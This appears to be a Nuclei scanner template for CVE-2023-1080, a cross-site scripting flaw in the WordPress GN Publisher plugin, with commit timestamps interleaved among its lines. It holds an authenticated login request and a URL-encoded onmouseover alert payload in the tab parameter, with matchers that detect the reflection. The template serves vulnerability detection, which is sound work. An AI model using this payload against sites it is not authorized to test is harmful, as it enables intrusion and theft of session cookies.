2023-03-31 11:28:24 +00:00
id : CVE-2023-1080
info :
2023-04-14 15:56:34 +00:00
name : WordPress GN Publisher <1.5.6 - Cross-Site Scripting
2023-03-31 11:28:24 +00:00
author : r3Y3r53
severity : medium
description : |
2023-04-14 15:56:34 +00:00
WordPress GN Publisher plugin before 1.5.6 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-03-31 11:28:24 +00:00
reference :
- https://wpscan.com/vulnerability/fcbcfb56-640d-4071-bc12-acac1b1e7a74
- https://wordpress.org/plugins/gn-publisher/
2023-03-31 16:11:22 +00:00
- https://www.wordfence.com/threat-intel/vulnerabilities/id/8a4ee97c-63cd-4a5e-a112-6d4c4c627a57
2023-04-14 15:56:34 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-1080
remediation : Fixed in version 1.5.6.
2023-03-31 11:28:24 +00:00
classification :
2023-03-31 16:11:22 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2023-03-31 11:28:24 +00:00
cve-id : CVE-2023-1080
2023-03-31 16:11:22 +00:00
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:gnpublisher:gn_publisher:*:*:*:*:*:*:*:*
epss-score : 0.00522
2023-03-31 11:28:24 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-03-31 11:28:24 +00:00
verified : "true"
2023-03-31 16:11:22 +00:00
tags : wp-plugin,wordpress,gn-publisher,authenticated,cve2023,wp,xss,wpscan,cve
2023-03-31 11:28:24 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-31 11:28:24 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options-general.php?page=gn-publisher-settings&tab=%22%2F+onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
matchers :
- type : dsl
dsl :
- 'status_code_2 == 200'
- 'contains(all_headers_2, "text/html")'
- 'contains(body_2, "/ onmouseover=alert(document.domain);//")'
- 'contains(body_2, "GN Publisher")'
condition : and
2023-04-14 15:56:34 +00:00
# Enhanced by md on 2023/04/14